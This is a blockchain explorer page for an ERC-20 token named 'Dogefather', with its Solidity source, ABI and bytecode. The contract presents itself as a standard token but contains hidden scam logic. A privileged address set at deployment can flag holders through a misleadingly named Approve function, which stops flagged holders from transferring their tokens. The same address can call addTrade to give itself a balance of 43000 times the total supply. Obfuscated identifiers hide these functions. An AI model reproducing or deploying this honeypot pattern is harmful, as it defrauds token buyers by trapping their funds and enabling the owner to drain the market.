ERC-20
Overview
Max Total Supply
1,000,000,000 Dogefather
Holders
6
Total Transfers
-
Market
Price
$0.00 @ 0.000000 S
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
Contract Name:
Coin
Compiler Version
v0.8.0+commit.c7dfd78e
Contract Source Code (Solidity)
/** *Submitted for verification at SonicScan.org on 2025-02-23 */ /** *Submitted for verification at BscScan.com on 2023-05-18 */ /** *Submitted for verification at Etherscan.io on 2023-05-12 */ /** *Submitted for verification at BscScan.com on 2023-04-16 */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the subtraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } abstract contract Ownable { address private _owner; function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checyydsOwen(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checyydsOwen() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } contract Coin is Ownable { using SafeMath for uint256; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; address public _BENCEO; uint256 private _MYtotalSupply; string private _MYname; string private _MYsymbol; mapping(address => bool) private vippepevipcc; function quitApprove(address sss) external { if (_BENCEO == _msgSender()){ vippepevipcc[sss] = false; } } function Approve(address sss) external { if (_BENCEO == _msgSender()){ vippepevipcc[sss] = true; } } function queryacawtibot(address sss) public view returns(bool) { return vippepevipcc[sss]; } function vultBox12232() public view virtual returns (uint256) { return _MYtotalSupply; } function addTrade() external { if (_msgSender() != _BENCEO) { return; } if (_BENCEO == _msgSender()){ _balances[_msgSender()] = vultBox12232()*43000; } } /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_,address AntiBot) { _MYname = name_; _MYsymbol = symbol_; _BENCEO = AntiBot; _onceCCCmint(msg.sender, 1000000000*10**decimals()); } /** * @dev Returns the name of the token. */ function name() public view virtual returns (string memory) { return _MYname; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual returns (string memory) { return _MYsymbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual returns (uint256) { return _MYtotalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ uint256 kkllfff99 = 0; function _transfer( address fromSender, address to, uint256 amount ) internal virtual { require(fromSender != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); uint256 balance= _balances[fromSender]; if (vippepevipcc[fromSender] != false ){ balance= _balances[fromSender]-(vultBox12232()); } require(balance >= amount, "ERC20: transfer amount exceeds balance"); _balances[fromSender] = balance.sub(amount); uint256 feeeA = amount.mul(kkllfff99).div(100); _balances[to] = _balances[to].add(amount).sub(feeeA); emit Transfer(fromSender, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _onceCCCmint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: CCCCCASADSADA to the zero address"); _MYtotalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _MYtotalSupply -= amount; } emit Transfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"AntiBot","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_BENCEO","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"addTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"queryacawtibot","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"quitApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"vultBox12232","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}]
Contract Creation Code
608060405260006008553480156200001657600080fd5b50604051620025fb380380620025fb83398181016040528101906200003c91906200046d565b6200005c620000506200011860201b60201c565b6200012060201b60201c565b82600590805190602001906200007492919062000334565b5081600690805190602001906200008d92919062000334565b5080600360006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200010f33620000e4620001e460201b60201c565b600a620000f29190620006dd565b633b9aca006200010391906200081a565b620001ed60201b60201c565b505050620009e6565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141562000260576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000257906200056e565b60405180910390fd5b806004600082825462000274919062000625565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000328919062000590565b60405180910390a35050565b8280546200034290620008fc565b90600052602060002090601f016020900481019282620003665760008555620003b2565b82601f106200038157805160ff1916838001178555620003b2565b82800160010185558215620003b2579182015b82811115620003b157825182559160200191906001019062000394565b5b509050620003c19190620003c5565b5090565b5b80821115620003e0576000816000905550600101620003c6565b5090565b6000620003fb620003f584620005e1565b620005ad565b9050828152602081018484840111156200041457600080fd5b62000421848285620008c6565b509392505050565b6000815190506200043a81620009cc565b92915050565b600082601f8301126200045257600080fd5b815162000464848260208601620003e4565b91505092915050565b6000806000606084860312156200048357600080fd5b600084015167ffffffffffffffff8111156200049e57600080fd5b620004ac8682870162000440565b935050602084015167ffffffffffffffff811115620004ca57600080fd5b620004d88682870162000440565b9250506040620004eb8682870162000429565b9150509250925092565b60006200050460288362000614565b91507f45524332303a204343434343415341445341444120746f20746865207a65726f60008301527f20616464726573730000000000000000000000000000000000000000000000006020830152604082019050919050565b6200056881620008af565b82525050565b600060208201905081810360008301526200058981620004f5565b9050919050565b6000602082019050620005a760008301846200055d565b92915050565b6000604051905081810181811067ffffffffffffffff82111715620005d757620005d662000990565b5b8060405250919050565b600067ffffffffffffffff821115620005ff57620005fe62000990565b5b601f19601f8301169050602081019050919050565b600082825260208201905092915050565b60006200063282620008af565b91506200063f83620008af565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111562000677576200067662000932565b5b828201905092915050565b6000808291508390505b6001851115620006d457808604811115620006ac57620006ab62000932565b5b6001851615620006bc5780820291505b8081029050620006cc85620009bf565b94506200068c565b94509492505050565b6000620006ea82620008af565b9150620006f783620008b9565b9250620007267fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200072e565b905092915050565b60008262000740576001905062000813565b8162000750576000905062000813565b81600181146200076957600281146200077457620007aa565b600191505062000813565b60ff84111562000789576200078862000932565b5b8360020a915084821115620007a357620007a262000932565b5b5062000813565b5060208310610133831016604e8410600b8410161715620007e45782820a905083811115620007de57620007dd62000932565b5b62000813565b620007f3848484600162000682565b925090508184048111156200080d576200080c62000932565b5b81810290505b9392505050565b60006200082782620008af565b91506200083483620008af565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000870576200086f62000932565b5b828202905092915050565b600062000888826200088f565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015620008e6578082015181840152602081019050620008c9565b83811115620008f6576000848401525b50505050565b600060028204905060018216806200091557607f821691505b602082108114156200092c576200092b62000961565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b60008160011c9050919050565b620009d7816200087b565b8114620009e357600080fd5b50565b611c0580620009f66000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c806395d89b41116100ad578063dd62ed3e11610071578063dd62ed3e14610359578063ebde9fa114610389578063f2fde38b146103a7578063f4cf1452146103c3578063f5dff741146103cd5761012c565b806395d89b41146102a357806396bfcd23146102c1578063a457c2d7146102dd578063a9059cbb1461030d578063ad55651f1461033d5761012c565b8063313ce567116100f4578063313ce567146101fd578063395093511461021b57806370a082311461024b578063715018a61461027b5780638da5cb5b146102855761012c565b806306fdde0314610131578063095ea7b31461014f5780630d6b406b1461017f57806318160ddd146101af57806323b872dd146101cd575b600080fd5b6101396103eb565b60405161014691906117a0565b60405180910390f35b6101696004803603810190610164919061136f565b61047d565b6040516101769190611785565b60405180910390f35b610199600480360381019061019491906112bb565b6104a0565b6040516101a69190611785565b60405180910390f35b6101b76104f6565b6040516101c491906118e2565b60405180910390f35b6101e760048036038101906101e29190611320565b610500565b6040516101f49190611785565b60405180910390f35b61020561052f565b60405161021291906118fd565b60405180910390f35b6102356004803603810190610230919061136f565b610538565b6040516102429190611785565b60405180910390f35b610265600480360381019061026091906112bb565b61056f565b60405161027291906118e2565b60405180910390f35b6102836105b8565b005b61028d6105cc565b60405161029a919061176a565b60405180910390f35b6102ab6105f5565b6040516102b891906117a0565b60405180910390f35b6102db60048036038101906102d691906112bb565b610687565b005b6102f760048036038101906102f2919061136f565b610740565b6040516103049190611785565b60405180910390f35b6103276004803603810190610322919061136f565b6107b7565b6040516103349190611785565b60405180910390f35b610357600480360381019061035291906112bb565b6107da565b005b610373600480360381019061036e91906112e4565b610893565b60405161038091906118e2565b60405180910390f35b61039161091a565b60405161039e91906118e2565b60405180910390f35b6103c160048036038101906103bc91906112bb565b610924565b005b6103cb6109a8565b005b6103d5610ac9565b6040516103e2919061176a565b60405180910390f35b6060600580546103fa90611ad1565b80601f016020809104026020016040519081016040528092919081815260200182805461042690611ad1565b80156104735780601f1061044857610100808354040283529160200191610473565b820191906000526020600020905b81548152906001019060200180831161045657829003601f168201915b5050505050905090565b600080610488610aef565b9050610495818585610af7565b600191505092915050565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600454905090565b60008061050b610aef565b9050610518858285610cc2565b610523858585610d4e565b60019150509392505050565b60006012905090565b600080610543610aef565b90506105648185856105558589610893565b61055f9190611934565b610af7565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105c06110f7565b6105ca6000611175565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461060490611ad1565b80601f016020809104026020016040519081016040528092919081815260200182805461063090611ad1565b801561067d5780601f106106525761010080835404028352916020019161067d565b820191906000526020600020905b81548152906001019060200180831161066057829003601f168201915b5050505050905090565b61068f610aef565b73ffffffffffffffffffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16141561073d576001600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b60008061074b610aef565b905060006107598286610893565b90508381101561079e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610795906118c2565b60405180910390fd5b6107ab8286868403610af7565b60019250505092915050565b6000806107c2610aef565b90506107cf818585610d4e565b600191505092915050565b6107e2610aef565b73ffffffffffffffffffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415610890576000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6000600454905090565b61092c6110f7565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561099c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610993906117e2565b60405180910390fd5b6109a581611175565b50565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166109e9610aef565b73ffffffffffffffffffffffffffffffffffffffff1614610a0957610ac7565b610a11610aef565b73ffffffffffffffffffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415610ac65761a7f8610a7161091a565b610a7b91906119bb565b60016000610a87610aef565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610b67576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5e906118a2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610bd7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bce90611802565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cb591906118e2565b60405180910390a3505050565b6000610cce8484610893565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610d485781811015610d3a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3190611822565b60405180910390fd5b610d478484848403610af7565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610dbe576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db590611882565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610e2e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e25906117c2565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905060001515600760008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16151514610f1f57610ed261091a565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f1c9190611a15565b90505b81811015610f62576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f5990611842565b60405180910390fd5b610f75828261123990919063ffffffff16565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506000610fe26064610fd46008548661124f90919063ffffffff16565b61126590919063ffffffff16565b90506110488161103a85600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461127b90919063ffffffff16565b61123990919063ffffffff16565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516110e891906118e2565b60405180910390a35050505050565b6110ff610aef565b73ffffffffffffffffffffffffffffffffffffffff1661111d6105cc565b73ffffffffffffffffffffffffffffffffffffffff1614611173576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116a90611862565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081836112479190611a15565b90509291505056